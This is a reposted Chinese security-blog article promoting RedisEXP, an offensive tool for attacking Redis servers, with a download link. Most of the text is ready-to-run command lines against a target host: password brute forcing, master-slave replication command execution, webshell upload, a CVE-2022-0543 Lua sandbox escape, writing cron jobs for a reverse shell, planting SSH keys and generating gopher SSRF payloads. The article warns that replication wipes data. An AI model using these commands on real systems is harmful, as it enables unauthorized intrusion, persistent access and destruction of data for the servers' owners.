【红队】Redis 漏洞利用工具

admin
admin
admin
138635
文章
114
评论
2023年12月27日16:40:06评论204 views字数 1405阅读4分41秒阅读模式
【红队】Redis 漏洞利用工具
工具介绍

RediesEXP 是一款Redis 漏洞利用工具,其功能包括,Redis 爆破、主从复制redis 写webshell、反弹shell、Lua沙盒绕过命令执行、ssh公钥、ssrf+redis利用等

 

【红队】Redis 漏洞利用工具

 

主从复制会清空数据,主从复制会清空数据,主从复制会清空数据,请注意使用!请注意使用!请注意使用!

 

工具使用

██████╗ ███████╗██████╗ ██╗███████╗    ███████╗██╗  ██╗██████╗██╔══██╗██╔════╝██╔══██╗██║██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗██████╔╝█████╗  ██║  ██║██║███████╗    █████╗   ╚███╔╝ ██████╔╝██╔══██╗██╔══╝  ██║  ██║██║╚════██║    ██╔══╝   ██╔██╗ ██╔═══╝██║  ██║███████╗██████╔╝██║███████║    ███████╗██╔╝ ██╗██║╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝
基本连接: RedisExp.exe -r 192.168.19.1 -p 6379 -w 123456
爆破 Redis 密码:RedisExp.exe brute -r 192.168.19.1 -f pass.txt
主从复制执行命令 (默认是交互式 shell)(Redis版本 4.x - 5.x):RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -c whoami (单次执行)RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -f exp.so (Linux)
主从复制文件上传 (windows 中文需要设置gbk)(Redis版本 4.x - 5.x):RedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -d c:\中文\ -f shell.php -F shell.txt -gRedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -f shell.php -F shell.txt
Lua沙盒绕过命令执行 CVE-2022-0543:RedisExp.exe lua -r 192.168.19.6 -c whoami
备份写 Webshell (Windows 中文路径要设置gbk, linux 中文路径不用设置):RedisExp.exe shell -r 192.168.19.1 -d c:\中文\ -f shell.php -s "<?php phpinfo();?>" -g
Linux 写计划任务:RedisExp.exe cron -r 192.168.19.1 -L 127.0.0.1 -P 2222
LinuxSSH 公钥:RedisExp.exe ssh -r 192.168.19.1 -u root -s "ssh-rsa AAAAB"
执行 Redis 命令:RedisExp.exe cli -r 192.168.19.1
生成 gopher ssrf redis payload: RedisExp.exe gopher -f 1.txt

 

 

下载链接

https://github.com/yuyan-sec/RedisEXP

 

 

原文始发于微信公众号(贝雷帽SEC):【红队】Redis 漏洞利用工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月27日16:40:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【红队】Redis 漏洞利用工具https://cn-sec.com/archives/2339370.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息